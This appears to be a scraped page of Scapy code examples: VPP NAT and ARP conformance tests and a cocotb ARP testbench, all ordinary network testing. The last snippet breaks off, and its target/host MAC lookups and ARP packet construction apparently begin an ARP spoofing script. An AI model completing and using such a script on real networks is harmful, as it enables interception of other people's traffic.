        self.send_and_expect_bridged(self.pg0, pkt_intra_epg * 65, self.pg1)

        #
        # EPs to the outside world
        #

        # in the EP's RD an external subnet via the NAT EPG's recirc
        se1 = VppGbpSubnet(self,
                           0,
                           "0.0.0.0",
                           0,
                           is_internal=False,
                           sw_if_index=recirc_nat.recirc.sw_if_index,
                           epg=epg_nat.epg)
        se1.add_vpp_config()
        se2 = VppGbpSubnet(self,
                           0,
                           "11.0.0.0",
                           8,
                           is_internal=False,
                           sw_if_index=recirc_nat.recirc.sw_if_index,
                           epg=epg_nat.epg)
        se2.add_vpp_config()
        se16 = VppGbpSubnet(self,
                            0,
                            "::",
                            0,
                            is_internal=False,
                            sw_if_index=recirc_nat.recirc.sw_if_index,
                            epg=epg_nat.epg,
                            is_ip6=True)
        se16.add_vpp_config()
        # in the NAT RD an external subnet via the NAT EPG's uplink
        se3 = VppGbpSubnet(self,
                           20,
                           "0.0.0.0",
                           0,
                           is_internal=False,
                           sw_if_index=epg_nat.uplink.sw_if_index,
                           epg=epg_nat.epg)
        se36 = VppGbpSubnet(self,
                            20,
                            "::",
                            0,
                            is_internal=False,
                            sw_if_index=epg_nat.uplink.sw_if_index,
                            epg=epg_nat.epg,
                            is_ip6=True)
        se4 = VppGbpSubnet(self,
                           20,
                           "11.0.0.0",
                           8,
                           is_internal=False,
                           sw_if_index=epg_nat.uplink.sw_if_index,
                           epg=epg_nat.epg)
        se3.add_vpp_config()
        se36.add_vpp_config()
        se4.add_vpp_config()

        self.logger.info(self.vapi.cli("sh ip fib 0.0.0.0/0"))
        self.logger.info(self.vapi.cli("sh ip fib 11.0.0.1"))
        self.logger.info(self.vapi.cli("sh ip6 fib ::/0"))
        self.logger.info(self.vapi.cli("sh ip6 fib %s" % eps[4].floating_ip))

        #
        # From an EP to an outside addess: IN2OUT
        #
        pkt_inter_epg_220_to_global = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst="1.1.1.1") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        # no policy yet
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_global * 65)

        c4 = VppGbpContract(self, 220, 333, 0)
        c4.add_vpp_config()

        self.send_and_expect_natted(self.pg0, pkt_inter_epg_220_to_global * 65,
                                    self.pg7, eps[0].floating_ip)

        pkt_inter_epg_220_to_global = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IPv6(src=eps[4].ip, dst="6001::1") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_natted6(self.pg0,
                                     pkt_inter_epg_220_to_global * 65,
                                     self.pg7, eps[4].floating_ip)

        #
        # From a global address to an EP: OUT2IN
        #
        pkt_inter_epg_220_from_global = (
            Ether(src=self.router_mac, dst=self.pg0.remote_mac) /
            IP(dst=eps[0].floating_ip, src="1.1.1.1") /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_assert_no_replies(self.pg7,
                                        pkt_inter_epg_220_from_global * 65)

        c5 = VppGbpContract(self, 333, 220, 0)
        c5.add_vpp_config()

        self.send_and_expect_unnatted(self.pg7,
                                      pkt_inter_epg_220_from_global * 65,
                                      eps[0].itf, eps[0].ip)

        pkt_inter_epg_220_from_global = (
            Ether(src=self.router_mac, dst=self.pg0.remote_mac) /
            IPv6(dst=eps[4].floating_ip, src="6001::1") /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_expect_unnatted6(self.pg7,
                                       pkt_inter_epg_220_from_global * 65,
                                       eps[4].itf, eps[4].ip)

        #
        # From a local VM to another local VM using resp. public addresses:
        #  IN2OUT2IN
        #
        pkt_intra_epg_220_global = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst=eps[1].floating_ip) /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_expect_double_natted(eps[0].itf,
                                           pkt_intra_epg_220_global * 65,
                                           eps[1].itf, eps[0].floating_ip,
                                           eps[1].ip)

        pkt_intra_epg_220_global = (
            Ether(src=self.pg4.remote_mac, dst=self.router_mac) /
            IPv6(src=eps[4].ip, dst=eps[5].floating_ip) /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_expect_double_natted6(eps[4].itf,
                                            pkt_intra_epg_220_global * 65,
                                            eps[5].itf, eps[4].floating_ip,
                                            eps[5].ip)

        #
        # cleanup
        #
        for ep in eps:
            # del static mappings for each EP from the 10/8 to 11/8 network
            if ep.af == AF_INET:
                self.vapi.nat44_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0,
                                                       addr_only=1,
                                                       is_add=0)
            else:
                self.vapi.nat66_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0,
                                                       is_add=0)

        for epg in epgs:
            # IP config on the BVI interfaces
            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip4_n,
                                                   32,
                                                   is_add=0)
            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip6_n,
                                                   128,
                                                   is_add=0,
                                                   is_ipv6=True)
            self.logger.info(self.vapi.cli("sh int addr"))

            epg.uplink.set_table_ip4(0)
            epg.uplink.set_table_ip6(0)

            if epg != epgs[0] and epg != epgs[3]:
                epg.bvi.set_table_ip4(0)
                epg.bvi.set_table_ip6(0)

                self.vapi.nat44_interface_add_del_feature(epg.bvi.sw_if_index,
                                                          is_inside=1,
                                                          is_add=0)
                self.vapi.nat66_add_del_interface(epg.bvi.sw_if_index,
                                                  is_inside=1,
                                                  is_add=0)

        for recirc in recircs:
            recirc.recirc.set_table_ip4(0)
            recirc.recirc.set_table_ip6(0)

            self.vapi.nat44_interface_add_del_feature(
                recirc.recirc.sw_if_index, is_inside=0, is_add=0)
            self.vapi.nat66_add_del_interface(recirc.recirc.sw_if_index,
                                              is_inside=0,
                                              is_add=0)
Ejemplo n.º 15
0
    async def recv(self):
        rx_frame = await self.sink.recv()

        eth = Ether()
        eth.dst = rx_frame.eth_dest_mac.integer.to_bytes(6, 'big')
        eth.src = rx_frame.eth_src_mac.integer.to_bytes(6, 'big')
        eth.type = rx_frame.eth_type.integer
        arp = ARP()
        arp.hwtype = rx_frame.arp_htype.integer
        arp.ptype = rx_frame.arp_ptype.integer
        arp.hwlen = rx_frame.arp_hlen.integer
        arp.plen = rx_frame.arp_plen.integer
        arp.op = rx_frame.arp_oper.integer
        arp.hwsrc = rx_frame.arp_sha.integer.to_bytes(6, 'big')
        arp.psrc = rx_frame.arp_spa.integer
        arp.hwdst = rx_frame.arp_tha.integer.to_bytes(6, 'big')
        arp.pdst = rx_frame.arp_tpa.integer
        rx_pkt = eth / arp

        return Ether(bytes(rx_pkt))
Ejemplo n.º 16
0
async def run_test(dut, idle_inserter=None, backpressure_inserter=None):

    tb = TB(dut)

    await tb.reset()

    tb.set_idle_generator(idle_inserter)
    tb.set_backpressure_generator(backpressure_inserter)

    local_mac = 'DA:D1:D2:D3:D4:D5'
    local_ip = '192.168.1.101'
    gateway_ip = '192.168.1.1'
    subnet_mask = '255.255.255.0'

    dut.local_mac <= int.from_bytes(mac2str(local_mac), 'big')
    dut.local_ip <= atol(local_ip)
    dut.gateway_ip <= atol(gateway_ip)
    dut.subnet_mask <= atol(subnet_mask)

    for k in range(10):
        await RisingEdge(dut.clk)

    tb.log.info("test ARP request")

    eth = Ether(src='5A:51:52:53:54:55', dst='FF:FF:FF:FF:FF:FF')
    arp = ARP(hwtype=1,
              ptype=0x0800,
              hwlen=6,
              plen=4,
              op=1,
              hwsrc='5A:51:52:53:54:55',
              psrc='192.168.1.100',
              hwdst='00:00:00:00:00:00',
              pdst='192.168.1.101')
    test_pkt = eth / arp

    await tb.send(test_pkt)

    rx_pkt = await tb.recv()

    tb.log.info("RX packet: %s", repr(rx_pkt))

    assert rx_pkt[Ether].dst.casefold() == test_pkt[Ether].src.casefold()
    assert rx_pkt[Ether].src.casefold() == local_mac.casefold()
    assert rx_pkt[Ether].type == test_pkt[Ether].type
    assert rx_pkt[ARP].hwtype == test_pkt[Ether].hwtype
    assert rx_pkt[ARP].ptype == test_pkt[Ether].ptype
    assert rx_pkt[ARP].hwlen == test_pkt[Ether].hwlen
    assert rx_pkt[ARP].plen == test_pkt[Ether].plen
    assert rx_pkt[ARP].op == 2
    assert rx_pkt[ARP].hwsrc.casefold() == local_mac.casefold()
    assert rx_pkt[ARP].psrc == local_ip
    assert rx_pkt[ARP].hwdst.casefold() == test_pkt[ARP].hwsrc.casefold()
    assert rx_pkt[ARP].pdst == test_pkt[ARP].psrc

    tb.log.info("Cached read")

    await tb.arp_req_source.send(ArpReqTransaction(ip=atol('192.168.1.100')))

    resp = await tb.arp_resp_sink.recv()

    tb.log.info("Read value: %s", resp)

    assert not resp.error
    assert resp.mac == int.from_bytes(mac2str(test_pkt[Ether].src), 'big')

    tb.log.info("Uncached read, inside subnet")

    await tb.arp_req_source.send(ArpReqTransaction(ip=atol('192.168.1.102')))

    # wait for ARP request
    rx_pkt = await tb.recv()

    tb.log.info("RX packet: %s", repr(rx_pkt))

    assert rx_pkt[Ether].dst.casefold() == "ff:ff:ff:ff:ff:ff".casefold()
    assert rx_pkt[Ether].src.casefold() == local_mac.casefold()
    assert rx_pkt[Ether].type == 0x0806
    assert rx_pkt[ARP].hwtype == 0x0001
    assert rx_pkt[ARP].ptype == 0x0800
    assert rx_pkt[ARP].hwlen == 6
    assert rx_pkt[ARP].plen == 4
    assert rx_pkt[ARP].op == 1
    assert rx_pkt[ARP].hwsrc.casefold() == local_mac.casefold()
    assert rx_pkt[ARP].psrc == local_ip
    assert rx_pkt[ARP].hwdst.casefold() == "00:00:00:00:00:00".casefold()
    assert rx_pkt[ARP].pdst == '192.168.1.102'

    # generate response
    eth = Ether(src='6A:61:62:63:64:65', dst=local_mac)
    arp = ARP(hwtype=1,
              ptype=0x0800,
              hwlen=6,
              plen=4,
              op=2,
              hwsrc='6A:61:62:63:64:65',
              psrc='192.168.1.102',
              hwdst=local_mac,
              pdst=local_ip)
    test_pkt = eth / arp

    await tb.send(test_pkt)

    resp = await tb.arp_resp_sink.recv()

    tb.log.info("Read value: %s", resp)

    assert not resp.error
    assert resp.mac == int.from_bytes(mac2str(test_pkt[Ether].src), 'big')

    tb.log.info("Uncached read, outside of subnet")

    await tb.arp_req_source.send(ArpReqTransaction(ip=atol('8.8.8.8')))

    # wait for ARP request
    rx_pkt = await tb.recv()

    tb.log.info("RX packet: %s", repr(rx_pkt))

    assert rx_pkt[Ether].dst.casefold() == "ff:ff:ff:ff:ff:ff".casefold()
    assert rx_pkt[Ether].src.casefold() == local_mac.casefold()
    assert rx_pkt[Ether].type == 0x0806
    assert rx_pkt[ARP].hwtype == 0x0001
    assert rx_pkt[ARP].ptype == 0x0800
    assert rx_pkt[ARP].hwlen == 6
    assert rx_pkt[ARP].plen == 4
    assert rx_pkt[ARP].op == 1
    assert rx_pkt[ARP].hwsrc.casefold() == local_mac.casefold()
    assert rx_pkt[ARP].psrc == local_ip
    assert rx_pkt[ARP].hwdst.casefold() == "00:00:00:00:00:00".casefold()
    assert rx_pkt[ARP].pdst == gateway_ip

    # generate response
    eth = Ether(src='AA:BB:CC:DD:EE:FF', dst=local_mac)
    arp = ARP(hwtype=1,
              ptype=0x0800,
              hwlen=6,
              plen=4,
              op=2,
              hwsrc='AA:BB:CC:DD:EE:FF',
              psrc='192.168.1.1',
              hwdst=local_mac,
              pdst=local_ip)
    test_pkt = eth / arp

    await tb.send(test_pkt)

    resp = await tb.arp_resp_sink.recv()

    tb.log.info("Read value: %s", resp)

    assert not resp.error
    assert resp.mac == int.from_bytes(mac2str(test_pkt[Ether].src), 'big')

    tb.log.info("Uncached read, timeout")

    await tb.arp_req_source.send(ArpReqTransaction(ip=atol('192.168.1.103')))

    # wait for ARP request
    for k in range(4):
        rx_pkt = await tb.recv()

        tb.log.info("RX packet: %s", repr(rx_pkt))

        assert rx_pkt[Ether].dst.casefold() == "ff:ff:ff:ff:ff:ff".casefold()
        assert rx_pkt[Ether].src.casefold() == local_mac.casefold()
        assert rx_pkt[Ether].type == 0x0806
        assert rx_pkt[ARP].hwtype == 0x0001
        assert rx_pkt[ARP].ptype == 0x0800
        assert rx_pkt[ARP].hwlen == 6
        assert rx_pkt[ARP].plen == 4
        assert rx_pkt[ARP].op == 1
        assert rx_pkt[ARP].hwsrc.casefold() == local_mac.casefold()
        assert rx_pkt[ARP].psrc == local_ip
        assert rx_pkt[ARP].hwdst.casefold() == "00:00:00:00:00:00".casefold()
        assert rx_pkt[ARP].pdst == '192.168.1.103'

    resp = await tb.arp_resp_sink.recv()

    tb.log.info("Read value: %s", resp)

    assert resp.error

    tb.log.info("Broadcast")

    await tb.arp_req_source.send(ArpReqTransaction(ip=atol('192.168.1.255')))

    resp = await tb.arp_resp_sink.recv()

    tb.log.info("Read value: %s", resp)

    assert not resp.error
    assert resp.mac == int.from_bytes(mac2str('FF:FF:FF:FF:FF:FF'), 'big')

    await tb.arp_req_source.send(ArpReqTransaction(ip=atol('255.255.255.255')))

    resp = await tb.arp_resp_sink.recv()

    tb.log.info("Read value: %s", resp)

    assert not resp.error
    assert resp.mac == int.from_bytes(mac2str('FF:FF:FF:FF:FF:FF'), 'big')

    assert tb.header_sink.empty()
    assert tb.payload_sink.empty()

    await RisingEdge(dut.clk)
    await RisingEdge(dut.clk)
Ejemplo n.º 17
0
 def getLocalDefaultIP():
     return ARP().psrc
Ejemplo n.º 18
0
    def test_arp(self):
        """ ARP """

        #
        # Generate some hosts on the LAN
        #
        self.pg1.generate_remote_hosts(11)

        #
        # Send IP traffic to one of these unresolved hosts.
        #  expect the generation of an ARP request
        #
        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1._remote_hosts[1].ip4) /
             UDP(sport=1234, dport=1234) / Raw())

        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)

        self.verify_arp_req(rx[0], self.pg1.local_mac, self.pg1.local_ip4,
                            self.pg1._remote_hosts[1].ip4)

        #
        # And a dynamic ARP entry for host 1
        #
        dyn_arp = VppNeighbor(self, self.pg1.sw_if_index,
                              self.pg1.remote_hosts[1].mac,
                              self.pg1.remote_hosts[1].ip4)
        dyn_arp.add_vpp_config()

        #
        # now we expect IP traffic forwarded
        #
        dyn_p = (
            Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
            IP(src=self.pg0.remote_ip4, dst=self.pg1._remote_hosts[1].ip4) /
            UDP(sport=1234, dport=1234) / Raw())

        self.pg0.add_stream(dyn_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)

        self.verify_ip(rx[0], self.pg1.local_mac, self.pg1.remote_hosts[1].mac,
                       self.pg0.remote_ip4, self.pg1._remote_hosts[1].ip4)

        #
        # And a Static ARP entry for host 2
        #
        static_arp = VppNeighbor(self,
                                 self.pg1.sw_if_index,
                                 self.pg1.remote_hosts[2].mac,
                                 self.pg1.remote_hosts[2].ip4,
                                 is_static=1)
        static_arp.add_vpp_config()

        static_p = (
            Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
            IP(src=self.pg0.remote_ip4, dst=self.pg1._remote_hosts[2].ip4) /
            UDP(sport=1234, dport=1234) / Raw())

        self.pg0.add_stream(static_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)

        self.verify_ip(rx[0], self.pg1.local_mac, self.pg1.remote_hosts[2].mac,
                       self.pg0.remote_ip4, self.pg1._remote_hosts[2].ip4)

        #
        # flap the link. dynamic ARPs get flush, statics don't
        #
        self.pg1.admin_down()
        self.pg1.admin_up()

        self.pg0.add_stream(static_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg1.get_capture(1)

        self.verify_ip(rx[0], self.pg1.local_mac, self.pg1.remote_hosts[2].mac,
                       self.pg0.remote_ip4, self.pg1._remote_hosts[2].ip4)

        self.pg0.add_stream(dyn_p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)
        self.verify_arp_req(rx[0], self.pg1.local_mac, self.pg1.local_ip4,
                            self.pg1._remote_hosts[1].ip4)

        #
        # Send an ARP request from one of the so-far unlearned remote hosts
        #
        p = (
            Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg1._remote_hosts[3].mac) /
            ARP(op="who-has",
                hwsrc=self.pg1._remote_hosts[3].mac,
                pdst=self.pg1.local_ip4,
                psrc=self.pg1._remote_hosts[3].ip4))

        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg1.local_mac,
                             self.pg1._remote_hosts[3].mac, self.pg1.local_ip4,
                             self.pg1._remote_hosts[3].ip4)

        #
        # VPP should have learned the mapping for the remote host
        #
        self.assertTrue(
            find_nbr(self, self.pg1.sw_if_index,
                     self.pg1._remote_hosts[3].ip4))
        #
        # Fire in an ARP request before the interface becomes IP enabled
        #
        self.pg2.generate_remote_hosts(4)

        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg2.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg2.remote_mac,
                 pdst=self.pg1.local_ip4,
                 psrc=self.pg2.remote_hosts[3].ip4))
        pt = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg2.remote_mac) /
              Dot1Q(vlan=0) / ARP(op="who-has",
                                  hwsrc=self.pg2.remote_mac,
                                  pdst=self.pg1.local_ip4,
                                  psrc=self.pg2.remote_hosts[3].ip4))
        self.send_and_assert_no_replies(self.pg2, p,
                                        "interface not IP enabled")

        #
        # Make pg2 un-numbered to pg1
        #
        self.pg2.set_unnumbered(self.pg1.sw_if_index)

        #
        # We should respond to ARP requests for the unnumbered to address
        # once an attached route to the source is known
        #
        self.send_and_assert_no_replies(
            self.pg2, p, "ARP req for unnumbered address - no source")

        attached_host = VppIpRoute(
            self, self.pg2.remote_hosts[3].ip4, 32,
            [VppRoutePath("0.0.0.0", self.pg2.sw_if_index)])
        attached_host.add_vpp_config()

        self.pg2.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg2.local_mac, self.pg2.remote_mac,
                             self.pg1.local_ip4, self.pg2.remote_hosts[3].ip4)

        self.pg2.add_stream(pt)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg2.local_mac, self.pg2.remote_mac,
                             self.pg1.local_ip4, self.pg2.remote_hosts[3].ip4)

        #
        # A neighbor entry that has no associated FIB-entry
        #
        arp_no_fib = VppNeighbor(self,
                                 self.pg1.sw_if_index,
                                 self.pg1.remote_hosts[4].mac,
                                 self.pg1.remote_hosts[4].ip4,
                                 is_no_fib_entry=1)
        arp_no_fib.add_vpp_config()

        #
        # check we have the neighbor, but no route
        #
        self.assertTrue(
            find_nbr(self, self.pg1.sw_if_index,
                     self.pg1._remote_hosts[4].ip4))
        self.assertFalse(find_route(self, self.pg1._remote_hosts[4].ip4, 32))
        #
        # pg2 is unnumbered to pg1, so we can form adjacencies out of pg2
        # from within pg1's subnet
        #
        arp_unnum = VppNeighbor(self, self.pg2.sw_if_index,
                                self.pg1.remote_hosts[5].mac,
                                self.pg1.remote_hosts[5].ip4)
        arp_unnum.add_vpp_config()

        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1._remote_hosts[5].ip4) /
             UDP(sport=1234, dport=1234) / Raw())

        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)

        self.verify_ip(rx[0], self.pg2.local_mac, self.pg1.remote_hosts[5].mac,
                       self.pg0.remote_ip4, self.pg1._remote_hosts[5].ip4)

        #
        # ARP requests from hosts in pg1's subnet sent on pg2 are replied to
        # with the unnumbered interface's address as the source
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg2.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg2.remote_mac,
                 pdst=self.pg1.local_ip4,
                 psrc=self.pg1.remote_hosts[6].ip4))

        self.pg2.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg2.local_mac, self.pg2.remote_mac,
                             self.pg1.local_ip4, self.pg1.remote_hosts[6].ip4)

        #
        # An attached host route out of pg2 for an undiscovered hosts generates
        # an ARP request with the unnumbered address as the source
        #
        att_unnum = VppIpRoute(self, self.pg1.remote_hosts[7].ip4, 32,
                               [VppRoutePath("0.0.0.0", self.pg2.sw_if_index)])
        att_unnum.add_vpp_config()

        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1._remote_hosts[7].ip4) /
             UDP(sport=1234, dport=1234) / Raw())

        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)

        self.verify_arp_req(rx[0], self.pg2.local_mac, self.pg1.local_ip4,
                            self.pg1._remote_hosts[7].ip4)

        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg2.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg2.remote_mac,
                 pdst=self.pg1.local_ip4,
                 psrc=self.pg1.remote_hosts[7].ip4))

        self.pg2.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg2.local_mac, self.pg2.remote_mac,
                             self.pg1.local_ip4, self.pg1.remote_hosts[7].ip4)

        #
        # An attached host route as yet unresolved out of pg2 for an
        # undiscovered host, an ARP requests begets a response.
        #
        att_unnum1 = VppIpRoute(
            self, self.pg1.remote_hosts[8].ip4, 32,
            [VppRoutePath("0.0.0.0", self.pg2.sw_if_index)])
        att_unnum1.add_vpp_config()

        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg2.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg2.remote_mac,
                 pdst=self.pg1.local_ip4,
                 psrc=self.pg1.remote_hosts[8].ip4))

        self.pg2.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg2.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg2.local_mac, self.pg2.remote_mac,
                             self.pg1.local_ip4, self.pg1.remote_hosts[8].ip4)

        #
        # Send an ARP request from one of the so-far unlearned remote hosts
        # with a VLAN0 tag
        #
        p = (
            Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg1._remote_hosts[9].mac) /
            Dot1Q(vlan=0) / ARP(op="who-has",
                                hwsrc=self.pg1._remote_hosts[9].mac,
                                pdst=self.pg1.local_ip4,
                                psrc=self.pg1._remote_hosts[9].ip4))

        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg1.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg1.local_mac,
                             self.pg1._remote_hosts[9].mac, self.pg1.local_ip4,
                             self.pg1._remote_hosts[9].ip4)

        #
        # Add a hierachy of routes for a host in the sub-net.
        # Should still get an ARP resp since the cover is attached
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg1.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg1.remote_mac,
                 pdst=self.pg1.local_ip4,
                 psrc=self.pg1.remote_hosts[10].ip4))

        r1 = VppIpRoute(self, self.pg1.remote_hosts[10].ip4, 30, [
            VppRoutePath(self.pg1.remote_hosts[10].ip4, self.pg1.sw_if_index)
        ])
        r1.add_vpp_config()

        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg1.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg1.local_mac, self.pg1.remote_mac,
                             self.pg1.local_ip4, self.pg1.remote_hosts[10].ip4)

        r2 = VppIpRoute(self, self.pg1.remote_hosts[10].ip4, 32, [
            VppRoutePath(self.pg1.remote_hosts[10].ip4, self.pg1.sw_if_index)
        ])
        r2.add_vpp_config()

        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg1.get_capture(1)
        self.verify_arp_resp(rx[0], self.pg1.local_mac, self.pg1.remote_mac,
                             self.pg1.local_ip4, self.pg1.remote_hosts[10].ip4)

        #
        # add an ARP entry that's not on the sub-net and so whose
        # adj-fib fails the refinement check. then send an ARP request
        # from that source
        #
        a1 = VppNeighbor(self, self.pg0.sw_if_index, self.pg0.remote_mac,
                         "100.100.100.50")
        a1.add_vpp_config()

        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 psrc="100.100.100.50",
                 pdst=self.pg0.remote_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for from failed adj-fib")

        #
        # ERROR Cases
        #  1 - don't respond to ARP request for address not within the
        #      interface's sub-net
        #  1b - nor within the unnumbered subnet
        #  1c - nor within the subnet of a different interface
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 pdst="10.10.10.3",
                 psrc=self.pg0.remote_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local destination")
        self.assertFalse(find_nbr(self, self.pg0.sw_if_index, "10.10.10.3"))

        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg2.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg2.remote_mac,
                 pdst="10.10.10.3",
                 psrc=self.pg1.remote_hosts[7].ip4))
        self.send_and_assert_no_replies(
            self.pg0, p, "ARP req for non-local destination - unnum")

        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 pdst=self.pg1.local_ip4,
                 psrc=self.pg1.remote_ip4))
        self.send_and_assert_no_replies(self.pg0, p, "ARP req diff sub-net")
        self.assertFalse(
            find_nbr(self, self.pg0.sw_if_index, self.pg1.remote_ip4))

        #
        #  2 - don't respond to ARP request from an address not within the
        #      interface's sub-net
        #   2b - to a prxied address
        #   2c - not within a differents interface's sub-net
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 psrc="10.10.10.3",
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local source")
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg2.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg2.remote_mac,
                 psrc="10.10.10.3",
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(
            self.pg0, p, "ARP req for non-local source - unnum")
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 psrc=self.pg1.remote_ip4,
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local source 2c")

        #
        #  3 - don't respond to ARP request from an address that belongs to
        #      the router
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 psrc=self.pg0.local_ip4,
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local source")

        #
        #  4 - don't respond to ARP requests that has mac source different
        #      from ARP request HW source
        #
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc="00:00:00:DE:AD:BE",
                 psrc=self.pg0.remote_ip4,
                 pdst=self.pg0.local_ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local source")

        #
        #  5 - don't respond to ARP requests for address within the
        #      interface's sub-net but not the interface's address
        #
        self.pg0.generate_remote_hosts(2)
        p = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
             ARP(op="who-has",
                 hwsrc=self.pg0.remote_mac,
                 psrc=self.pg0.remote_hosts[0].ip4,
                 pdst=self.pg0.remote_hosts[1].ip4))
        self.send_and_assert_no_replies(self.pg0, p,
                                        "ARP req for non-local destination")

        #
        # cleanup
        #
        dyn_arp.remove_vpp_config()
        static_arp.remove_vpp_config()
        self.pg2.unset_unnumbered(self.pg1.sw_if_index)

        # need this to flush the adj-fibs
        self.pg2.unset_unnumbered(self.pg1.sw_if_index)
        self.pg2.admin_down()
        self.pg1.admin_down()
Ejemplo n.º 19
0
import sys

from scapy.layers.l2 import Ether, ARP, sendp
from scapy.layers.l2 import getmacbyip

if __name__ == '__main__':
    if len(sys.argv) < 3:
        sys.exit(1)
    target_ip = sys.argv[1]
    host = sys.argv[2]
    target_mac = getmacbyip(target_ip)
    host_mac = getmacbyip(host)
    pkt = Ether() / ARP(
